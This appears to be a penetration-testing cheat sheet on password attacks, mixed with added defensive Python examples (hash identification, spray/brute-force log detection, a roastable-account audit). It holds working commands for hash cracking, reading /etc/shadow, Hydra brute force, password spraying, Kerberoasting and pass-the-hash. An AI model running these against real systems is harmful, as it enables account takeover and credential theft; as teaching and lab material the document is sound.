- Identify the hash type before cracking — hashcat's -m mode must match the algorithm or you will never crack anything
- Hashcat is GPU-accelerated — orders of magnitude faster than CPU-based tools; hardware quality directly determines crack speed
- Dictionary attacks with rules (best64, dive) outperform brute force for real-world passwords that have been "humanised"
- Password spraying sends one password to many accounts — check lockout policy first or you will lock out every account you target
- NTLM hashes do not require cracking — use them directly in Pass-the-Hash attacks against Windows systems
Overview
Password attacks span the full lifecycle — from capturing hashes off the wire to cracking them offline, from brute-forcing login forms to spraying a single password across thousands of accounts. Understanding which technique applies when is as important as the tooling itself.
Prerequisites
- Basic understanding of authentication: what hashing and salting do, the difference between NTLM and Kerberos
- Comfortable with the Linux terminal — hashcat and John run from the command line
- An active engagement or CTF context — you need captured hashes or a live target to spray against
Recommended lab: HackTheBox machines with credential-harvesting opportunities (Forest, Active, Resolute for AD environments). TryHackMe "John The Ripper" room. Download practice hash sets from hashes.org.
Hash Identification
Before cracking, identify the hash type. The format determines the attack mode and speed.
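Added example (not code from the page, hashid or hash-identifier): a small Python classifier that applies the shape rules listed below and maps each candidate to the hashcat -m value this page gives for it. Because MD5 and NTLM share a shape, it returns a list of candidates rather than one answer, and it rates each format by how exposed it is to offline cracking. It also recomputes the page's MD5 and SHA1 samples from the string "password" to show why unsalted digests are cheap to attack. The bcrypt and sha512crypt inputs are constructed dummies of the right shape, not real hashes.

```python
import hashlib
import re

# Shape-based signatures, tested in order. Several formats share a shape
# (MD5 and NTLM are both 32 hex characters), so the result is a list of
# candidates, each paired with the hashcat -m value given on this page.
SIGNATURES = [
    (re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$"), [("bcrypt", 3200)]),
    (re.compile(r"^\$6\$(?:rounds=\d+\$)?[^$]{1,16}\$[./A-Za-z0-9]{86}$"), [("sha512crypt", 1800)]),
    (re.compile(r"^[0-9a-fA-F]{40}$"), [("SHA1", 100)]),
    (re.compile(r"^[0-9a-fA-F]{32}$"), [("MD5", 0), ("NTLM", 1000)]),
]

# Iterated, salted formats: every guess costs thousands of rounds and a
# cracked hash reveals only one account's password.
SLOW_SALTED = {"bcrypt", "sha512crypt"}


def identify(value):
    """Return [(format, hashcat_mode), ...] for a hash string, [] if unrecognised."""
    value = value.strip()
    for pattern, candidates in SIGNATURES:
        if pattern.match(value):
            return list(candidates)
    return []


def assess(value):
    """Identify the hash and rate how exposed it is to offline cracking."""
    candidates = identify(value)
    if not candidates:
        return {"candidates": [], "verdict": "unknown"}
    slow = all(name in SLOW_SALTED for name, _ in candidates)
    return {"candidates": candidates, "verdict": "slow-salted" if slow else "fast-unsalted"}


def digest_of(password, algorithm):
    """Unsalted digest of a password: identical input always gives the identical hash."""
    return hashlib.new(algorithm, password.encode("utf-8")).hexdigest()


# Constructed inputs for a stand-alone run. The first three are the digests
# of "password" quoted on this page; the last two are format-shaped dummies,
# not real hashes of anything.
SAMPLES = [
    "5f4dcc3b5aa765d61d8327deb882cf99",
    "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8",
    "8846f7eaee8fb117ad06bdd830b7586c",
    "$2y$10$" + "a" * 53,
    "$6$saltsalt$" + "b" * 86,
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[:24].ljust(26), assess(sample))
    # Unsalted MD5 of "password" reproduces the page's sample exactly.
    print(digest_of("password", "md5"))
```

A 32-hex result still needs context to settle: a dump from a Windows SAM or NTDS is NTLM (-m 1000), a web application's users table is more likely MD5 (-m 0). Running hashcat with the wrong one of the two simply never matches.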
# Identify hash type
hashid '$2y$10$somehashedvalue'
hash-identifier
# Common hash examples
# MD5: 32 hex chars 5f4dcc3b5aa765d61d8327deb882cf99
# SHA1: 40 hex chars 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
# NTLM: 32 hex chars 8846f7eaee8fb117ad06bdd830b7586c
# bcrypt: $2y$ or $2b$ prefix
# sha512crypt: $6$ prefix (Linux /etc/shadow)
Offline Hash Cracking
Hashcat
Hashcat is GPU-accelerated — orders of magnitude faster than CPU cracking.
# Dictionary attack
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
# Dictionary + rules (best results for real-world passwords)
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Brute-force mask (8 chars, upper+lower+digits)
hashcat -m 1000 hashes.txt -a 3 ?u?l?l?l?d?d?d?d
# Common hash modes
# -m 0 MD5
# -m 100 SHA1
# -m 1000 NTLM
# -m 1800 sha512crypt (Linux shadow)
# -m 3200 bcrypt
# -m 13100 Kerberos TGS-REP, RC4 etype 23 (Kerberoasting); AS-REP roasting is -m 18200
# -m 22000 WPA2 (handshake)
# Resume a session
hashcat --session mysession --restore
John the Ripper
Better for format auto-detection and certain hash types.
# Auto-detect and crack
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Crack Linux shadow file
unshadow /etc/passwd /etc/shadow > combined.txt
john combined.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Show cracked passwords
john hashes.txt --show
# Crack zip/office/ssh key passwords
zip2john secret.zip > zip.hash && john zip.hash
ssh2john id_rsa > ssh.hash && john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt
Network Authentication Attacks
Hydra — Online Brute Force
# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.5
# HTTP POST login form
hydra -l admin -P passwords.txt 10.10.10.5 http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"
# Multiple usernames from file
hydra -L users.txt -P passwords.txt ftp://10.10.10.5
# SMB
hydra -l Administrator -P passwords.txt smb://10.10.10.5
Password Spraying
Spraying sends one password to many accounts, so each account sees a single failure and stays below the per-account thresholds that trigger lockouts.
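The defender's side of both the Hydra section above and spraying: an added Python detector (not part of the page or of any tool named on it) that reads sshd-style failure lines and classifies each source address by the shape of its attempts. Brute force is many failures against one account; a spray is one or two failures against many accounts, which never trips a per-account lockout counter and so only shows up when you key on the source rather than the account. The log lines, thresholds and window are constructed for the example.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sshd-style failures (not real traffic). 10.0.0.9 hammers one
# account (online brute force, the hydra pattern); 10.0.0.7 tries each of
# six accounts exactly once (spray); 10.0.0.3 is a single user typo.
SAMPLE_LOG = """\
Jan 10 09:00:01 bastion sshd[4101]: Failed password for admin from 10.0.0.9 port 50100 ssh2
Jan 10 09:00:02 bastion sshd[4102]: Failed password for admin from 10.0.0.9 port 50101 ssh2
Jan 10 09:00:03 bastion sshd[4103]: Failed password for admin from 10.0.0.9 port 50102 ssh2
Jan 10 09:00:04 bastion sshd[4104]: Failed password for admin from 10.0.0.9 port 50103 ssh2
Jan 10 09:00:05 bastion sshd[4105]: Failed password for admin from 10.0.0.9 port 50104 ssh2
Jan 10 09:00:06 bastion sshd[4106]: Failed password for admin from 10.0.0.9 port 50105 ssh2
Jan 10 09:05:00 bastion sshd[4201]: Failed password for alice from 10.0.0.7 port 41000 ssh2
Jan 10 09:05:01 bastion sshd[4202]: Failed password for bob from 10.0.0.7 port 41001 ssh2
Jan 10 09:05:02 bastion sshd[4203]: Failed password for invalid user carol from 10.0.0.7 port 41002 ssh2
Jan 10 09:05:03 bastion sshd[4204]: Failed password for dave from 10.0.0.7 port 41003 ssh2
Jan 10 09:05:04 bastion sshd[4205]: Failed password for erin from 10.0.0.7 port 41004 ssh2
Jan 10 09:05:05 bastion sshd[4206]: Failed password for frank from 10.0.0.7 port 41005 ssh2
Jan 10 09:30:00 bastion sshd[4301]: Failed password for alice from 10.0.0.3 port 39000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)


def parse(log_text, year=2024):
    """Return (timestamp, source_ip, username) for each failed-login line."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:  # syslog omits the year, so supply one
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["ip"], m["user"]))
    return events


def detect(events, window_seconds=600, brute_min=5, spray_min_users=5, spray_max_per_user=2):
    """Classify each source IP as brute-force, spray, or nothing, using a sliding window."""
    by_ip = defaultdict(list)
    for ts, ip, user in events:
        by_ip[ip].append((ts, user))
    findings = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            users = Counter()
            for ts, user in attempts[i:]:
                if (ts - start).total_seconds() > window_seconds:
                    break
                users[user] += 1
            top_user, top_count = users.most_common(1)[0]
            if top_count >= brute_min:
                findings[ip] = {"kind": "brute-force", "user": top_user, "attempts": top_count}
                break
            # Spray: breadth across accounts, depth per account kept below lockout thresholds
            if len(users) >= spray_min_users and top_count <= spray_max_per_user:
                findings[ip] = {"kind": "spray", "users": len(users), "attempts": sum(users.values())}
                break
    return findings


if __name__ == "__main__":
    for ip, finding in detect(parse(SAMPLE_LOG)).items():
        print(ip, finding)
```

The same two shapes apply to Windows 4625 events and to SMB or Kerberos failures from CrackMapExec and kerbrute; only the parser changes. A slow spray that spreads attempts over hours needs a wider window or a count of distinct accounts per source per day.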
# SMB spraying with CrackMapExec
crackmapexec smb 10.10.10.0/24 -u users.txt -p 'Winter2024!' --continue-on-success
# Active Directory spraying
kerbrute passwordspray -d domain.local --dc 10.10.10.5 users.txt 'Password123'
# Office 365 / Azure AD spray
./MSOLSpray.py --userlist users.txt --password 'Spring2024!'
Kerberos Attacks
AS-REP Roasting
Targets accounts with "Do not require Kerberos pre-authentication" enabled.
# Get AS-REP hashes without credentials
GetNPUsers.py domain.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.5 -format hashcat -outputfile asrep.txt
# Crack with hashcat mode 18200
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
Kerberoasting
Targets service accounts with SPNs — requires any domain user account.
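The defender's mirror of GetNPUsers.py and GetUserSPNs.py, as an added Python example (not the page's code and not Impacket's): given the attributes an LDAP query returns, it lists enabled accounts with pre-authentication disabled (AS-REP roastable) and enabled user accounts carrying an SPN (Kerberoastable), with password age, since a long-lived service-account password is what makes a Kerberoast crack feasible. The records, the fixed "now" and the staleness threshold are constructed; the userAccountControl bit values and the FILETIME encoding of pwdLastSet are the real ones.

```python
from datetime import datetime, timedelta, timezone

# userAccountControl bits (two of many in the AD schema)
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000   # the "Do not require Kerberos preauthentication" checkbox

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """pwdLastSet is a Windows FILETIME: 100-nanosecond ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def to_filetime(dt):
    return int((dt - FILETIME_EPOCH).total_seconds()) * 10_000_000


# Fixed "now" and constructed directory records (the attributes an LDAP
# query would return) so the run is deterministic; none of this is real.
NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)
ACCOUNTS = [
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/db01.domain.local:1433"],
     "pwdLastSet": to_filetime(NOW - timedelta(days=900))},
    {"sAMAccountName": "svc_web", "userAccountControl": 0x10200,
     "servicePrincipalName": ["HTTP/web01.domain.local"],
     "pwdLastSet": to_filetime(NOW - timedelta(days=10))},
    {"sAMAccountName": "legacy_app", "userAccountControl": 0x10200 | UF_DONT_REQUIRE_PREAUTH,
     "servicePrincipalName": [], "pwdLastSet": to_filetime(NOW - timedelta(days=400))},
    {"sAMAccountName": "old_user",
     "userAccountControl": 0x10200 | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE,
     "servicePrincipalName": [], "pwdLastSet": to_filetime(NOW - timedelta(days=2000))},
    {"sAMAccountName": "WS01$", "userAccountControl": 0x1020,
     "servicePrincipalName": ["HOST/ws01.domain.local"],
     "pwdLastSet": to_filetime(NOW - timedelta(days=20))},
]


def asrep_roastable(accounts):
    """Enabled accounts whose AS-REP can be requested without proving a password."""
    return [a["sAMAccountName"] for a in accounts
            if a["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH
            and not a["userAccountControl"] & UF_ACCOUNTDISABLE]


def kerberoastable(accounts, now=NOW, stale_days=365):
    """Enabled user accounts with an SPN, plus password age in days."""
    findings = []
    for a in accounts:
        name, uac = a["sAMAccountName"], a["userAccountControl"]
        if not a["servicePrincipalName"] or uac & UF_ACCOUNTDISABLE:
            continue
        if name.endswith("$"):
            continue  # computer accounts rotate long random passwords automatically
        age_days = (now - filetime_to_datetime(a["pwdLastSet"])).days
        findings.append((name, age_days, "stale" if age_days > stale_days else "ok"))
    return findings


if __name__ == "__main__":
    print("AS-REP roastable:", asrep_roastable(ACCOUNTS))
    print("Kerberoastable:  ", kerberoastable(ACCOUNTS))
```

In a real audit the same attributes come from an LDAP search over the domain. Each hit is one the attacker's queries above will also find: clear the pre-auth flag on the first list, and move the second list to group Managed Service Accounts or long random passwords so the TGS ticket never cracks.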
# Request TGS tickets for all SPNs
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.5 -request -outputfile tgs.txt
# Crack with hashcat mode 13100
hashcat -m 13100 tgs.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
Wordlist Strategy
The wordlist is often the limiting factor, not the tool.
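Why dictionary plus rules beats brute force, turned around for the defence: an added Python password filter (not from the page, hashcat or John) that undoes the mutations best64-style rules apply (case, leet substitutions, appended years and symbols) and checks the remaining base word against a denylist. The denylist is a constructed stand-in for a breach-derived list; the page's own spray candidates "Winter2024!" and "Password123" reduce to banned words and are rejected.

```python
import re

# Constructed denylist of base words. A real deployment would load a
# breach-derived list (rockyou-style) plus company-specific terms.
BANNED = {"password", "welcome", "admin", "letmein", "qwerty",
          "winter", "spring", "summer", "autumn", "acmecorp"}

# Undo the character substitutions a best64-style rule set applies
LEET = str.maketrans({"@": "a", "4": "a", "3": "e", "1": "i", "!": "i",
                      "0": "o", "$": "s", "5": "s", "7": "t"})
EDGE = re.compile(r"^[\d\W_]+|[\d\W_]+$")   # leading/trailing digits and symbols


def base_words(candidate):
    """Every plausible base word behind a candidate: lowercase, un-leet, drop affixes."""
    lowered = candidate.lower()
    variants = set()
    for form in (lowered, EDGE.sub("", lowered)):
        for v in (form, form.translate(LEET)):
            variants.add(v)
            variants.add(EDGE.sub("", v))
    return variants


def is_weak(candidate, banned=BANNED):
    """True if the candidate reduces to a banned base word under common mutations."""
    return any(word in banned for word in base_words(candidate))


if __name__ == "__main__":
    for pw in ["P@ssw0rd2024!", "Winter2024!", "Spring2024!", "Password123",
               "Tr0ub4dor&3", "glacier-manifold-47"]:
        print(f"{pw:22} {'reject' if is_weak(pw) else 'accept'}")
```

A candidate that survives this filter is not necessarily strong, only not a trivially mutated dictionary word; length and a breach-list check still apply. The point is that a complexity policy satisfied by "Winter2024!" buys nothing against a rules-based attack, because the rule set generates exactly that mutation.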
# Generate custom wordlist from target website
cewl http://target.com -d 3 -m 5 -w custom_wordlist.txt
# Add mutations with john rules
john --wordlist=custom_wordlist.txt --rules --stdout > mutated.txt
# Combine multiple lists
cat /usr/share/wordlists/rockyou.txt custom_wordlist.txt | sort -u > combined.txt
# Top wordlists on Kali
ls /usr/share/wordlists/
# rockyou.txt — 14M passwords, classic
# /usr/share/seclists/Passwords/ — curated collections
Operational Notes
- Never spray without knowing the lockout policy — 3 wrong attempts on a 30-minute lockout destroys the engagement.
- NTLM hashes don't need cracking — use pass-the-hash directly against SMB/WinRM.
- GPU vs CPU — bcrypt on CPU is 100 H/s; on GPU it's 20,000 H/s. Hardware matters.
- Check the hashcat potfile — previously cracked hashes are stored there and are skipped automatically on later runs.
What to Read Next
- Post-Exploitation — cracked credentials enable lateral movement and privilege escalation across the network
- Reconnaissance — cracked passwords reveal naming conventions useful for targeted spraying
- Exploitation — Kerberos attacks (Kerberoasting, AS-REP Roasting) often precede full domain compromise